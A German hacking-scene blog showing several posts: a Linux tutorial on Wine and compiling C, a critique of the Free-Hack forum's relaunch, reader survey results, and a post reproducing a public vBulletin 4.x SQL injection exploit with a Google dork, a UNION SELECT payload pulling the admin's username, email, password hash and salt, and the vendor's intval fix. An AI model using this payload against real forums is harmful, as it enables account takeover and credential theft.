Linux – Umstieg auf ein freies Betriebssystem Teil 6

Hallo,

heute folgt (nach langer Pause) Teil sechs meiner “Tutorialreihe”, in diesem Teil werde ich euch zeigen, wie man unter Linux “spielen” und “programmieren” kann. Dieser Teil wird nicht besonders lange ausfallen, weil ich bereits am Anfang schon erwaehnte, dass Zocker auf Linux nicht viel zu suchen haben.

Spiele unter Linux
Die meisten aktuellen Spiele unterstuetzen oft (neben Konsolen) ausschließlich Windows, ein Beispiel von vielen dafuer ist GTA IV, welches an “Windows Live” gebunden ist. Doch woran liegt das?

In erster Linie liegt das an den Herstellern, weil die Zielgruppe der Zocker nunmal hauptsaechlich auf Windows setzt und es sich (aus ihrer Sicht) nicht “rentiert” – ich nenns mal “plattformunabhaengige” – Spiele zu entwickeln. Das ist einerseits nachvollziehbar und andererseits aber auch nicht gut fuer Linux Nutzer. Es gibt einfach zu wenig “Linux Zocker”. Steam zum Beispiel moechte keine Linux Edition rausbringen, obwohl es dafuer Geruechte gab – sie arbeiten lieber an einem Mac Client. Fuer Linux gibt es dann oftmals nur alte Spiele – aber was ist wenn man trotzdem unter Linux “zocken” moechte?

Man moege es ueber Wine probieren, mithilfe von Wine lassen sich Windows Anwendungen (sprich .exe Dateien) ueber Linux ausfuehren. Ich bin kein sonderlich großer Fan davon und hab es auch nicht installiert, weil jemand der auf Linux umsteigt und “Wine” als erstes installiert, sollte sich ueberlegen, ob Linux das richtige Betriebssystem ist.. aber ich schweif vom Thema ab.

Je nach Linux Distribution laesst es sich ziemlich einfach und oftmals aus den Repos installieren
auf Ubuntu / Debianarten:
(sudo) apt-get install wine

Danach die .exe Datei einfach mithilfe von Wine ausfuehren und testen, Steam laesst sich darueber zum Beispiel auch installieren und auch Counter-Strike Source sollte laufen, je nach Grafikkartentreiber macht das dann mehr oder weniger probleme – einige beobachten eine hoehrere FPS Anzahl bei Counter-Strike Source im Vergleich zu CSS auf Windows Systemen.. hab ich selber aber nicht getestet.

Aktuelle Spielen koennen funktionieren, aber das muss man dann erst testen (wie so einiges auf Linux 🙂 )

Das heißt jedoch nicht, dass es keine Games fuer Linux gibt. Es gibt auch viele Games die in einer plattformunabhaengigen Programmiersprache geschrieben wurden (und nicht Windows voraussetzen), ein ziemlich gutes Beispiel dafuer ist Minecraft (ein gaaaaanz tolles Spiel uebrigens 😀 ), das in Java geschrieben wurde und sowohl unter Windows & Mac, als auch Linux funktioniert.

Wenn wir nun schon beim Thema Programmieren sind, dann richtig..

Programmieren unter Linux

Wer unter Linux programmieren moechte, sollte sich plattformunabhaengige Sprachen anschauen – das heißt am besten Programmiersprachen wie C, C++, Java, ASM (…) und Scriptsprachen wie (HTML/CSS,) PHP, Perl, Python, Javascript, … – auf bekannten Sprachen wie Visual Basic (.NET), C# und Delphi sollte man verzichten.

Es gibt auch fuer Linux ganze Entwicklungsumgebungen (IDEs) zum Beispiel von Code::Blocks und anderen Herstellern, aber ich bleib oftmals bei einfachen Mitteln und anhand von diesen werd ich euch in C zeigen, wie man unter Linux “programmiert”. Ich werde euch nicht programmieren beibringen, sondern veranschaulichen, wie “einfach” es unter Linux gehen kann.

Was benoetigt man?
– Einen Editor wie vim / nano / gedit / emacs / was auch immer – am besten mit Syntax Highlighting
– Einen Compiler (gcc fuer C / g++ fuer C++)
– Linux Console/Terminal

Los gehts!
Ich werde vim verwenden, damit wir alles mit einem “Terminal” fenster machen.
Oeffnet euer Terminal, gibt ein “vim hello.c” – wer noch nie mit vim gearbeitet hat, drueckt einfach mal “i” damit unten links “INSERT” steht, nun gebt ihr folgendes ein:

#include <stdio.h>
 
int main()
{
  printf("Hello World!\n");
}

Die Leute die C koennen sehen was passiert, aber an die, die es nicht koennen, in Zeile 1 fuegen wir den Standard Input Output Header ein, d.h. in dieser Datei steht quasi drin, was Befehle wie “printf” machen sollen. Mit int main() { starten wir unser Hauptprogramm, printf gibt den text aus, welcher in den Anfuehrungszeichen steht, \n faengt eine neue Zeile an und das semikolon beendet den befehl, die } schließt unser “Hauptprogramm”. Danach drueckt man einfach escape und gibt “:wq” ein, was fuer “write” und “quit” steht, d.h. so viel wie “speichern und beenden”. Das kleine Programm sollte fuer unseren Test reichen, nun geben wir ein:

gcc hello.c -o hello

gcc – unser c-compiler
hello.c – unser dateiname
-o hello – name der “fertig” compilierten Datei (-o steht fuer output, mehr befehle kann man sich mit “man gcc” anschauen)

Wenn nun keine Fehlermeldung erscheint, dann ist alles fein, ansonsten steht in der Fehlermeldung, in welcher Zeile man sich vertippt bzw. einen Fehler gemacht hat.

Ausfuehren kann man Dateien unter Linux mit ./dateiname:
./hello

Wenn die Ausgabe so aussieht, ist alles fein:

[[email protected] ~]$ gcc hello.c -o hello
[[email protected] ~]$ ./hello
Hello World!
[[email protected] ~]$

Und das wars! Wir haben ein Programm in C geschrieben, compiliert und ausgefuehrt – so einfach und schnell geht das unter Linux 😀 Und das ohne Entwicklungsumgebungen und anderen Muell in einem einzigen Terminalfenster. Ich mein klar, wenn man groessere Projekte vor hat, koennen IDEs von großer Hilfe sein, aber das sollte erstmal zur “Demonstrierung” reichen, wie man unter Linux programmieren kann.

In anderen Sprachen wie PHP, Perl, etc geht das uebrigens genauso einfach, sie lassen ich mit “php dateiname.php” / “perl dateiname.pl” / “python dateiname.py” ausfuehren.

So viel erstmal zum Thema Spiele und Programmieren unter Linux, wer nun vielleicht Spaß an C gefunden hat ( wer weiß ^-^ ), kann sich die Sprache auch weiter anschauen, gibt einige OpenBooks und Tutorials im Internet, auch wenn C schon “uralt” (im Vergleich zu anderen Sprachen) ist, ist die Sprache nach wie vor maechtig und fast ueberall im Einsatz.

Die naechsten Teile werden jeweils Dualboot von Windows und Linux, Festplattenverschluesselung unter Linux, Installation von Ubuntu & Fedora und “die wichtigsten” Linux Commands beinhalten.

Bis zum naechsten Teil!

Free-Hack.com is for the lulz

Ahoi,

vor fast genau einem Monat, hatte ich ueber den Relaunch von Free-Hack.com berichtet. Da schon der Relaunchtext teilweise voller grober Rechtschreibfehler war und das Team mich nicht ueberzeugte, hab ich anfangs keine Meinung dazu abgegeben, aber da sich die Fragen haeuften “was haelst du vom neuem Free-Hack” und “was haelst du von deinem ehemaligen baby” werde ich das nun doch hier tun.

Ich habe eigentlich nicht vor hier nun einen großen Roman darueber zu schreiben, werde aber doch in einigen Punkten auflisten, was ich am neuen F-H nicht gut finde. Auch wird der Eintrag einigen Leuten zusagen und anderen widerum nicht. Mir geht es auch nicht darum, Leute schlecht da stehen zu lassen oder zu beleidigen, sondern ich werde meine Meinung ueber Free-Hack veroeffentlichen und zwar, weil mir selber noch einiges daran liegt. Ich werde uebrigens statt Free-Hack nun immer “F-H” verwenden, nicht das sich jemand drueber wundert.

Nun gut, soviel zum “Vorspann” 😀 Ich werde etwas ueber die Vergangenheit, den aktuellen Zustand und die damalige Zukunftsvision erzaehlen.

Wie man am Titel erkennen kann, ist F-H fuer mich im aktuellen Zustand mehr oder weniger ein schlechter Witz. In dem einen Monat ist viel vorgefallen was den Ruf von F-H einfach ins negative gezogen hatte. Man braucht da auch nicht groß rumreden, der alte Ruf von Free-Hack war nicht perfekt und oftmals von vielen als “erste Anlaufstelle fuer Scriptkiddies” gesehen, aber man hatte stets versucht sein eigenes Ding zu machen (von Anfang an!), sich von “Scenekleinkriegen” rauszuhalten und auf ernste Fragen gabs auch ernste Antworten. Abgesehen davon herrschte sowohl fuer die User, als auch Teamintern ein sehr angenehmes Klima, das Team war “eingespielt” und groessere Probleme gab es eigentlich nicht. Auch traf man dort einige Leute, mit einiges an Erfahrungen und die “Experten” Gruppe war gut gewaehlt.

Das die “Ninjas” meinten:

To our surprise they
really had nothing to do with fraud. Still, they are part of the
problem we call the skiddy breeding of lameness.

Mag schon stimmen, und in dieser Hinsicht wurde auch nachgedacht – dazu spaeter mehr.

Schauen wir uns nun erstmal das aktuelle F-H an – gehen wir zuerst auf das “erste Team” ein:
Administratoren:
– 6RbK9 – Administrator von HackBase.cc ( Community Center of Hacking,Fraud & more ), F-H hostet uebrigens auf seinem Root Server, somit sind F-H und HB auf einem Server.
– ea$y (war damals “Experte” auf Free-Hack)
Moderatoren:
– NoNameMT – netter Bursche 🙂
– nubcake – wer ist das?

Dann schauen wir uns das aktuelle Team dort an:

Administratoren:
– ea$y: macht auf mich einen leicht ueberforderten Eindruck, kommt nicht mehr ganz hinterher, wenn es darum geht, die ganzen Aufgaben zu bewaeltigen. Ich habe den Eindruck ihm fehlt ein wenig die Kraft und Motivation F-H voran zu treiben.

S-Moderatoren:
– Freepler (Ex Moderator von Free-Hack ~ 2008 rum)
– maoshe (Ex Moderator von Free-Hack bis 2010 )
– NoNameMT (zu dem hatte ich oben ja was gesagt)

Moderatoren:
– BlackDesert (kenn ich persoenlich nicht, aber paar mal etwas ueber ihn gelesen)
– ezah ( auch noch nie gehoert )
– N1GH7F1R3 ( Moderator vom letzten F-H Team Dez 2010)

Special Member
– enco (Ex Admin von F-H)
– 6RbK9 (zwar “nur” Special Member, spielt aber gerne mal Moderator, da man als special member entsprechende rechte hat)

Wenn man das “neue” Team mit dem “alten” Vergleicht, dann finde ich mangelt es stark a) in der Administrationsebene und b) in der Moderatoren ebene. Inkompetent ist vllt ein harter Ausdruck, aber ich wuerde nicht behaupten wollen, dass das neue Team “kompetenter” ist, als das alte. Soweit ich das mitbekommen hab, scheint auch Team Intern einiges noch lange nicht zu stimmen und es gibt viele Unklarheiten.

Nun gut, soviel zum Team erstmal.. dann schauen wir uns mal etwas fuers Auge an, naemlich das Design. Das erste Design welches man zum Relaunch sehen durfte war ja soo .. ich drueck es mal so aus, wie es mir jemand geschrieben hatte “lol ich dachte bei mir wird das Design im IE nur falsch dargestellt” daraufhin antwortet ich “das ist keine falsche Darstellung, sondern das neue F-H Design”. Auch das jetzige ist gewoehnungsbeduerftig (ich werde mich wohl nicht mehr dran gewoehnen) und das “Du bist eingeloggt!” im Header ist ziemlich sinnlos.

Das neue Team scheint sich auch nicht so recht fuer die “Angebote” von F-H zu interessieren, scheint es der Blog, der nopaste Dienst oder der TeamSpeak Server. Ich bin oftmals im F-H TeamSpeak anzutreffen, aber vom neuen F-H Team sieht man dort niemanden, eher “alte Hasen” trifft man dort.

Dann schauen wir uns nun mal den “neuen Server” an, wie oben erwaehnt hosten F-H und HB auf dem gleichen Server bei 2×4.ru – es ist zwar der “beste DDoS Protected” Server den 2×4 bietet, aber trotzdem ist der Server tagtaeglich sooo langsam und schlecht zu erreichen, wenn man mal drauf kommt, kann man mit einem Datenbank Error rechnen. Suicide hatte damals keine so hohen Ausgaben fuer F-H und es lief um einiges stabiler.

Alte Prinzipien werden getreten, F-H hielt sich von Anfang an aus dem ganzen Fraud mist raus (sprich Faking, Carding und andere Themen bezueglich Betrug waren Tabu) und was hat man vor 2 Wochen sehen duerfen? Einen Banner unten im Forum, welcher gefakte Bahntickets anbietet “um die Serverkosten zu decken” – gehts noch?! Da gab es dann bei vielen Membern und auch einigen Team Membern großen Widerstand dagegen und nun ist er weg – doch da fragt man sich, wenn F-H und HB auf einem Server hostet, wieso postet man den Banner nicht groß in den Header von HB, wenns dort zum “Boardthema” passt? Ea$y scheinte dazu eher weniger zu sagen und kurz danach “tritt” 6Rbk9 zurueck – um den Ruf von F-H wieder zu retten?

Da ich gerade ja schon “viele Member” angesprochen hatte, was sagen die “alten” und aktuellen Member dazu? Die alten trifft man wie gesagt oftmals im TS und die meisten stimmten mir auch zu, als ich ihnen die Punkte aufgelistet hatte und letztens hab ich auf F-H erst eine PN von einem Member erhalten mit folgendem Inhalt:

[…] Ich war noch nie irgendwo anders Registriert als bei FH und so schwer es mir fällt das zu sagen, aber lieber wäre FH mit dem guten Ruf den es hatte untergegangen anstatt so wie jetzt langsam kaputt gemacht zu werden. […]

Wird F-H langsam kapputt gemacht? Die Antwort ist ja! Auf F-H wurden damals stuendlich x Posts erstellt, es waren extrem viele Member pro Tag online und die meisten Neuregistrationen bestanden nicht aus Spambots, heute werden an einem Tag gerade mal die Top 15 Stats ausgefuellt (bezueglich neue Posts) und man hat Spaß daran, “alte” User zu ermahnen.

Nun nochmal zurueck zu den Happy Ninjas, sie meinten ja “they are part of the problem we call the skiddy breeding of lameness.” das mag zwar mehr oder weniger stimmen und das “problem” war bekannt und uns bewusst – und ob ihr es glaubt oder nicht, aber ich war dort ja so gesehen “nur knapp ein Monat Admin” und Suicide und ich hatten einige Plaene bezueglich F-H, einen kleine Ausschnitt aus unserem ICQ Gespraech vom 06.11.2010:

(12:47:11 PM) Suicide: Es geht darum, ob du an einem roten Namen interessiert wärst? Ich hab darüber schon mit enco gesprochen. […]
Das Forum soll komplett auf den Kopf gestellt werden. Ich will das Alter erhöhen. Ich will ein Team das vernünftig mit den Usern umgeht und ihnen mit Rat und Tat zur Seite steht. Nicht so wie sich einige in letzter Zeit verhalten haben.. […]
Ebenso einige tricky Fragen bei der Registrierung. Ich will von diesem Satz weg “FH = Anfängerboard”. Profilierende Teammitglieder, dumme trollende Leute, etc.

(Hab Suicide uebrigens nicht gefragt, ob ich das posten darf :-* )

Ich hatte das dann angenommen, wurde Co Admin und wir hatten das ein oder andere schon geplant, nur wusste das keiner. Somit ist die Aktion der Ninjas zwar nachvollziehbar gewesen, kam aber zum falschen Zeitpunkt, weil wir noch einige Ideen und Vorschlaege hatten bezueglich F-H. An Usern und Potenzial hats nicht gemangelt, weil wenn auch nur 500 von den 40k Membern lernwillig waren, sind das immernoch mehr als die meisten anderen “Sceneboard” besitzen. Die meisten von euch werden sich nun denken “warum hast du es dann nicht einfach uebernommen?” – das ist eine gute Frage und ich hab schon mehrmals drueber nachgedacht, aber ohne Suicide und Co, einfach so tun als ob nichts gewesen waere.. das waere nicht das gleiche gewesen.

Schlussendlich kann man sagen, ist der aktuelle Zustand einfach nur Traurig, vorallem da ich viel Zeit und Arbeit in jeden einzelnen Beitrag / Sticky investiert habe, um nun zu sehen, wie das Ergebnis aussieht.

Man kann das aktuelle F-H auch mit der Titanic vergleichen, nur sind Suicide, enco, die restlichen Team Member und ich bereits auf einem “Rettungsbot”.

Aber eines steht fest, wenn ea$y “den Kurs nicht aendern” will, oder glaubt ohne “viel Aufwand” F-H einfach weiter zu fuehren, dann wird es einfach unter gehen.

Ergebnis Meinungsumfrage

Ahoi,

erstmal ein Dankeschoen an alle, die an meiner Umfrage teilgenommen haben – es waren am Ende 117 Teilnehmer und der Großteil hat die Umfrage auch ernst genommen. 🙂

Die Auswertung der Fragen 1 – 8 werdet ihr hier sehen, Frage 9 war ja eure “persoenliche” Meinung an mich, daher wird das hier nicht veroeffentlicht.

Frage 1: Wie alt bist du?
Zuerst wollte ich wissen, wie alt in etwa meine Zielgruppe ist.

 < 12    - 1.71% 
 13 - 14 - 3.42% 
 15 - 16 - 14.53% 
 17 - 18 - 28.21% 
 19 - 20 - 17.95% 
 21 - 22 - 16.24% 
 > 23 	 - 17.95%

alter

Frage 2: Du bist..
Ob hier wohl weibliche Personen vertreten sind? 😀

Maennlich - 97.39% 
Weiblich  - 2.61%

geschlecht

Frage 3: Woher kennst du meinen Blog?
Wie seid ihr auf meinen Blog gestoßen? (:

 Durch Google / andere Suchmaschinen - 5.98% 
 Durch Freunde / Bekannte - 5.98% 
 Werbung auf Foren - 13.68% 
 Durch dich (zum Beispiel auf verschiedenen Foren) - 54.70% 
 Twitter -  5.13% 
 Sonstiges - 14.53%

Woher kennst du meinen Blog

Frage 4: Mein Blog hat 5 Kategorien, welche davon interessiert dich am meisten?
Welche Sektion interessiert euch am meisten? Eure weiteren Kategorienvorschlaege poste ich auch nicht oeffentlich, sondern behalte sie erstmal fuer mich und werde es ueberdenken 🙂

 Allgemein - 5.26% 
 Exploits - 8.77% 
 Szene News - 28.95% 
 Tutorials - 28.07% 
 Vulnerable Sites - 2.63% 
 Mir gefallen alle - 26.32%

Kategorie

Frage 5: Nun darfst du die Kategorien nach ihrem Inhalt bewerten
Wie gefallen dir die Posts in den einzelnen Sektionen?

Inhalt

Frage 6: Wie oft besuchst du meinen Blog? (2 Auswahlmoeglichkeiten)
Wie oft schaust du vorbei?

 Taeglich - 12.41% 
 1-2 Mal pro Woche - 22.63% 
 3-4 Mal pro Woche - 17.52% 
 Woechentlich - 9.49% 
 Alle 2-3 Wochen - 7.30% 
 Monatlich - 2.19% 
 Wenn es etwas neues gibt und ich darueber informiert werde (Twitter RSS Feeds ...) - 28.47%

Besucherstatistik

Frage 7: Welche Aussagen treffen auf dich zu?
Da die Ergebnisse mein Design zerstoeren, weil es zu breit ist, ist hier ein direktlink:

*klick*

Frage 8: Wie stehst du zu meinen neuen Vorschlaegen?
Genauso ein direktlink:

*klick*

Zur Frage 9 hab ich noch einen Satz zu sagen, danke fuer eure nette Mitteilung, auch wenn die ein oder andere nicht nett ist, aber sowas kommt vor, sonst waere es ja langweilig. Das “porn” fehlt sehe ich zum Beispiel genauso ( 😀 ). Aber ansonsten gibts 2 unterschiedliche Meinungen bezueglich den “Szene News”, die einen sagen “hoer bloß auf damit, es ist uninteressant / blah”, aber andererseits sieht man oben, bei Frage 4 das doch knapp ein Drittel daran interessiert ist.
Man kann es eigentlich nie allen recht machen, weil jeder eben etwas unterschiedlich drauf ist und andere Meinungen zum Thema hat, aber ich werd trotzdem versuchen das in Zukunft so zu gestalten, dass die Leute, die nicht an “Szene News” interessiert sind, es sich trotzdem durchlesen oder einfach akzeptieren.

Wie wird es nun weiter gehen?

Ich werde mir natuerlich alle eure Ratschlaege zu Herzen nehmen und plane dann auch das ein oder andere hier zu veraendern. Wann es soweit sein wird kann ich noch nicht sagen, spaetestens jedoch, wenn mein Blog umzieht und die Infrastruktur umgestellt wird. Auch werden dann oefters mal wieder Blogeintraege folgen und vielleicht ein neues Design ^-^

In diesem Sinne, Danke fuer eure Meinung zu meinem Blog und einen tollen Start in die neue Woche wuensch ich euch! (:

vBulletin 4.0.x => 4.1.4 (messagegroupid) SQL Injection Vulnerability

Ahoi,

vor ein paar Monaten, hatte ich zu einer SQL Injection in vBulletin ja schon einige Worte geschrieben, heute folgen die naechsten Worte.

Das lustige ist, dass es im prinzip das selbe Modul wie damals war.

Das Exploit ist seit gestern bzw. heute draußen:

# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
# Google Dork: intitle: powered by Vbulletin 4
# Date: 20/07/2011
# Author: FB1H2S	
# Software Link: [[url]http://www.vbulletin.com/][/url]
# Version: [4.x.x]
# Tested on: [relevant os]
# CVE : [[url]http://members.vbulletin.com/][/url]
 
######################################################################################################
Vulnerability:
######################################################################################################
 
Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation.
 
#####################################################################################################
Vulnerable Code:
#####################################################################################################
 
File:    /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid
 
 
 
 
		if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0)
 
		{
 
			$value = $registry->GPC['messagegroupid'];
 
			if (!is_array($value))
 
			{
 
				$value = array($value);
 
			}
 
 
 
			if (!(in_array(' ',$value) OR in_array('',$value)))
 
			{
 
				if ($rst = $vbulletin->db->query_read("
 
					SELECT socialgroup.name
 
					FROM " . TABLE_PREFIX."socialgroup AS socialgroup
 
--->					WHERE socialgroup.groupid IN (" . implode(', ', $value) .")")
 
 
			}
 
 
 
############################################################################################
Exploitation:
############################################################################################
Post data on: -->search.php?search_type=1
	      --> Search Single Content Type
 
Keywords :   Valid Group Message
 
Search Type : Group Messages 
 
Search in Group : Valid Group Id
 
&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
 
##########################################################################################
More Details:
##########################################################################################
Http://www.Garage4Hackers.com
http://www.garage4hackers.com/showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day
 
 
###########################################################################################
Note:
###########################################################################################
 
Funny part was that, a similar bug was found in the same module, search query two months back. Any way Vbulletin has released a patch as it was reported to them by altex, hence
customers are safe except those lowsy Admins. And this bug is for people to play with the many Nulled VB sites out there. " Say No to Piracy Disclosure ".

Quelle: http://www.exploit-db.com/exploits/17555/

Schlicht gehalten und das wichtigste ist drin. Der Exploit Titel ist uebrigens falsch, da es die Version 4.1.4 genauso betrifft.

Zum Thema ausnutzen muss ich denk ich nichts sagen, das hab ich beim letzten Mal ausfuehrlich getan und das klappt im Prinzip in diesem Exploit genauso.

Aber zum Thema Luecke fixxen werd ich ein paar Dinge sagen, die ich mir nicht selber ausgedacht habe, sondern werde diese vom vB veroeffentlichtem Patch uebernehmen:

Wie im obigen Exploit zu sehen, geht es um den Code in Zeile 397 (den kompletten code block seht ihr im exploit oben):

WHERE socialgroup.groupid IN (" . implode(', ', $value) .")")

Das wurde nun geaendert zu:

WHERE socialgroup.groupid IN (" . implode(', ', array_map('intval', $value)) .")")

Eine weitere Zeile die geaendert wurde ist 424:

					WHERE socialgroupcategory.socialgroupcategoryid IN (" . implode(', ', $value) .")")

wurde geaendert in:

					WHERE socialgroupcategory.socialgroupcategoryid IN (" . implode(', ', array_map('intval', $value)) .")")

Dann Zeile 511 – 515:

	protected $type_globals = array (
		'nocache'            => TYPE_UINT,
		'messagegroupid'     => TYPE_ARRAY,
		'categoryid'         => TYPE_ARRAY
	);

zu

	protected $type_globals = array (
		'nocache'            => TYPE_UINT,
		'messagegroupid'     => TYPE_ARRAY_UINT,
		'categoryid'         => TYPE_ARRAY_UINT,
	);

Kunden koennen sich den Patch natuerlich im Kundenpanel runterladen.

Wer sich nun denkt “toll, und was soll das ganze?” – in erster Linie wollte ich den Blogeintrag schreiben, weil die Luecke quasi im gleichen Modul ist zu der von damals und als zweiten Gedanken um den Leuten ohne vB Lizenz eine Moeglichkeit zu geben, ihr Board vor der Luecke zu schuetzen – als dritter Gedanke sollte natuerlich auch meinem Slogan dieser Blogeintrag gewidmet sein.

Bis zur naechsten vB Vuln 😉

Deine Meinung ist gefragt!

j0hnx3r.org gibt es nun seit 2 1/2 Jahren, im Vergleich zu damals sind die Besucherzahlen gestiegen und bleiben konstant, auch der Blog hat sich mitveraendert, manchmal ueberlege ich lange nach, was ich als naechstes Bloggen soll, was euch interessieren koennte.

Daher ist heute mal eure Meinung gefragt, was interessiert euch, was interessiert euch nicht, was findet ihr scheiße und was findet ihr gut? Was wuerdet ihr aendern und was wuerdet ihr gleich lassen?

Diese Umfrage soll mir vorallem dabei helfen, einen Ueberblick ueber meine Zielgruppe zu verschaffen – daher werde ich euch am Anfang 2 “persoenliche” Fragen stellen, danach folgen Fragen zum Inhalt und zum Schluss duerft ihr mir Verbesserungsvorschlaege, Kritik & Lob geben.

Bitte nehmt euch die Zeit und beantwortet alle Fragen moeglichst wahrheitsgemaeß.

Zur Umfrage geht es hier lang…

Seid so gut und nehmt nur einmal teil – zu gewinnen gibt es … nichts 😉

Das ganze geht eine Woche, danach gebe ich das Ergebnis von Frage 1-8 auch oeffentlich bekannt – Viel Spaß!